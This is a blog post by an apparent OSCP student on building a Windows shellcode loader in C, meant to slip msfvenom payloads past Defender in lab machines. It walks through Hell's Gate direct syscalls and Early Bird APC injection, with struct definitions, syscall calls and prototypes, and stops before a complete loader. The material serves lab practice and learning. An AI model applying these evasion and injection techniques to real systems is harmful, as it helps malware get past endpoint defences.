Windows Shellcode Loader in C

Opening Thoughts

Over the past couple of months I have gone through the Zero2Automated malware RE course and the Malware Development course from MalDev Academy. The malware RE course is pretty easy to practice, as there are plenty of samples and challenges online to reverse, but finding a challenge for malware development is a bit trickier. Fortunately, I ran into some problems while studying for the OSCP exam and doing HackTheBox. Many of the boxes running Windows 10 were able to detect msfvenom payloads, mimikatz, and other malicious PowerShell scripts, which made it very difficult to get a reverse shell on what should have been very simple boxes. The OSCP teaches you to use Shellter, but even this tool was failing to bypass Defender. At this point I figured it’d be a good investment to build my own loader so that I wouldn’t have to worry about this issue again. I had actually done this project once in C++, but hindsight is 20/20 and I arrived at the conclusion that writing it in C is the better option. My reasoning is that a loader isn’t super complicated, so the organization and object-oriented approach of C++ doesn’t really buy me anything, and the added overhead from C++ just makes the final executable larger. Since I’ll be working on boxes where the network bandwidth isn’t great, a small and portable executable is better.

Design

I was talking to someone who’s been developing game cheats for over 10 years, and he told me that all you really need is memory injection and streaming relocations. Streaming relocations are a bit overkill for this project, so I’ll skip them, but injection is definitely the way to go. In the first version I used local APC injection and ran into issues with my shell dying once the original process terminated. I’m sure I could fix it, but since this is supposed to be an improvement over my 1.0 loader I want to go with remote APC injection, aka Early Bird APC injection. I will also need a quick and easy way of hashing strings and encrypting my msfvenom payloads. For these requirements I’ll just use the same code snippets taught in the MalDev course, since crypto isn’t one of my strengths.
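To give a feel for what "hashing strings" means here, below is a minimal sketch using djb2, a well-known general-purpose string hash. This is a stand-in I picked for illustration: the course's actual routine and seed are not reproduced, and the names `hash_djb2` and `name_matches` are hypothetical.

```c
#include <stdint.h>

/* djb2 string hash (Dan Bernstein). Illustrative stand-in only:
   the course's own hashing routine is not shown in this post. */
static uint32_t hash_djb2(const char *s)
{
    uint32_t h = 5381;                     /* conventional djb2 seed */
    while (*s != '\0') {
        h = h * 33u + (unsigned char)*s;   /* h = h*33 + c, wraps mod 2^32 */
        s++;
    }
    return h;
}

/* Compare a candidate string against a precomputed hash value
   instead of against a string literal. */
static int name_matches(const char *candidate, uint32_t wanted)
{
    return hash_djb2(candidate) == wanted;
}
```

The idea is that the wanted value is computed ahead of time, so only a 32-bit constant has to be stored and compared. A 32-bit hash can collide, so it only suits small, known sets of names.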

Hell’s Gate

Windows syscalls are the low-level routines that actually carry out the work when a WinAPI function is called. The example given in the course is that VirtualAlloc and VirtualAllocEx both use NtAllocateVirtualMemory to carry out their actions. All the syscalls return an NTSTATUS value that indicates success or an error code. We can use the following docs since most syscalls aren’t documented by Microsoft:

The main advantage of using syscalls directly is that we can sidestep hooked WinAPI functions. On x64, a syscall stub has the following structure:

mov r10, rcx
mov eax, SSN
syscall

SSN refers to the syscall service number that the kernel uses to distinguish one syscall from another. It’s important to note that these values can differ for the same syscall across different OSes and OS versions.
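One practical note on the NTSTATUS return value mentioned earlier: the usual way to test it is by sign, since success and informational codes are non-negative while warnings and errors have the high bit set. Here is a small portable sketch of that check. On Windows the `NTSTATUS` type, the `NT_SUCCESS` macro, and the status constants come from the system headers; they are redefined here only so the snippet compiles anywhere, and `describe_status` is a hypothetical helper.

```c
#include <stdint.h>

typedef int32_t NTSTATUS;   /* on Windows this is LONG, a signed 32-bit value */

/* Same test as the NT_SUCCESS macro in the Windows headers:
   success and informational codes are >= 0. */
#define NT_SUCCESS(status) (((NTSTATUS)(status)) >= 0)

#define STATUS_SUCCESS        ((NTSTATUS)0x00000000L)
#define STATUS_ACCESS_DENIED  ((NTSTATUS)0xC0000022L)

/* Hypothetical helper: turn a status into a short label for logging. */
static const char *describe_status(NTSTATUS status)
{
    return NT_SUCCESS(status) ? "ok" : "failed";
}
```

Checking every return value this way makes it much easier to see which call in a chain failed, instead of finding out several steps later.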

Hell’s Gate is a technique that can read through ntdll.dll to find and execute syscalls. It’s a pretty complex technique that I won’t go over here since that isn’t the purpose of this post. But you can read about it here. We can follow the guidance in that paper to get the technique working. Long story short, we will add a VX_TABLE_ENTRY to our VX_TABLE for every syscall we want to use:

typedef struct _VX_TABLE_ENTRY {
    PVOID pAddress;
    DWORD dwHash;
    WORD  wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;

typedef struct _VX_TABLE {
    VX_TABLE_ENTRY NtCreateUserProcess;
    VX_TABLE_ENTRY <some_syscall>;
} VX_TABLE, * PVX_TABLE;

This table will be populated via the GetVxTableEntry(...) function given in the paper.

The HellsGate function then loads the SSN of the syscall we want, and HellDescent actually makes the call:

HellsGate(g_Sys.NtSyscallEntry.wSystemCall);
HellDescent(arg1, arg2, arg3, ...);

Early Bird APC Injection

Asynchronous Procedure Calls (APCs) are functions that execute asynchronously in the context of a specific thread. We can queue an APC to a thread, and the thread will run the APC function once it is in a position to do so. For an APC queued by an application (a user-mode APC), that means the thread must be in an alertable state, i.e. it has entered a “wait” that permits APC delivery. The "early bird" part of this technique refers to targeting the main thread of a freshly created, still-suspended remote process instead of a thread in the local one. So we would do the following:

Spawn process in suspended state.
Write payload to address space of suspended process.
Get a handle to the suspended thread.
Pass the address of the written payload and the thread handle to QueueUserAPC.
Resume thread and wait for payload to run.
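The alertable-state rule is what the whole sequence hinges on, so a toy model of it may help. This is plain portable C and not the Windows API: `toy_thread`, `toy_queue_apc`, `toy_wait`, and `bump` are hypothetical names made up for this sketch. On Windows the real counterparts are QueueUserAPC and an alertable wait such as SleepEx with its alertable flag set to TRUE.

```c
#include <stddef.h>

#define MAX_APCS 8

typedef void (*apc_fn)(void *arg);

/* Toy stand-in for a thread's user-mode APC queue (not a Windows structure). */
typedef struct {
    apc_fn fns[MAX_APCS];
    void  *args[MAX_APCS];
    size_t count;
} toy_thread;

/* Analogue of queuing an APC: the call is recorded, nothing runs yet.
   Returns 1 on success, 0 if the queue is full. */
static int toy_queue_apc(toy_thread *t, apc_fn fn, void *arg)
{
    if (t->count == MAX_APCS) return 0;
    t->fns[t->count]  = fn;
    t->args[t->count] = arg;
    t->count++;
    return 1;
}

/* Analogue of a wait: pending APCs are delivered only if the wait
   is alertable. Returns how many APCs ran. */
static size_t toy_wait(toy_thread *t, int alertable)
{
    size_t ran = 0;
    if (!alertable) return 0;                 /* queue stays untouched */
    for (size_t i = 0; i < t->count; i++) {   /* first in, first out */
        t->fns[i](t->args[i]);
        ran++;
    }
    t->count = 0;
    return ran;
}

/* Example APC routine: increments the int it is handed. */
static void bump(void *arg) { (*(int *)arg)++; }
```

Queuing `bump` and then calling `toy_wait(&t, 0)` leaves the counter unchanged, while `toy_wait(&t, 1)` runs it. That is the behaviour to keep in mind: a queued APC just sits there until the target thread reaches a point where delivery is allowed.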

Something interesting to note is that normally you’d spawn the process like this:

BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);

CreateProcessA(
    NULL, 
    lpPath,
    NULL,
    NULL,
    FALSE,
    DEBUG_PROCESS, // dwCreationFlags
    NULL,
    NULL,
    &StartupInfo,
    &ProcInfo);

However, I am using the syscall NtCreateUserProcess, which takes a different set of arguments, so the call looks a bit different:

#define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 // NtCreateUserProcess & NtCreateThreadEx

HellsGate(g_Sys.NtCreateUserProcess.wSystemCall);
HellDescent(
    hProcess,
    hThread,
    PROCESS_ALL_ACCESS,
    NULL,
    NULL,
    NULL,
    THREAD_CREATE_FLAGS_CREATE_SUSPENDED,
    UppProcessParameters,
    &psCreateInfo,
    pAttributeList
);

To learn more about how NtCreateUserProcess works I recommend this blog.

Now we just write our payload into the memory space of this process. For this, we need to update our syscall table structure with 3 more syscalls, whose prototypes are:

typedef NTSTATUS(NTAPI* fnNtAllocateVirtualMemory)(
    HANDLE      ProcessHandle,
    PVOID*      BaseAddress,
    ULONG_PTR   ZeroBits,
    PSIZE_T     RegionSize,
    ULONG       AllocationType,
    ULONG       Protect
);
typedef NTSTATUS(NTAPI* fnNtProtectVirtualMemory)(
    HANDLE  ProcessHandle,
    PVOID*  BaseAddress,
    PSIZE_T NumberOfBytesToProtect,
    ULONG   NewAccessProtection,
    PULONG  OldAccessProtection
);
typedef NTSTATUS(NTAPI* fnNtWriteVirtualMemory)(
    HANDLE  ProcessHandle,
    PVOID   BaseAddress,
    PVOID   Buffer,
    SIZE_T  NumberOfBytesToWrite,
    PSIZE_T NumberOfBytesWritten
);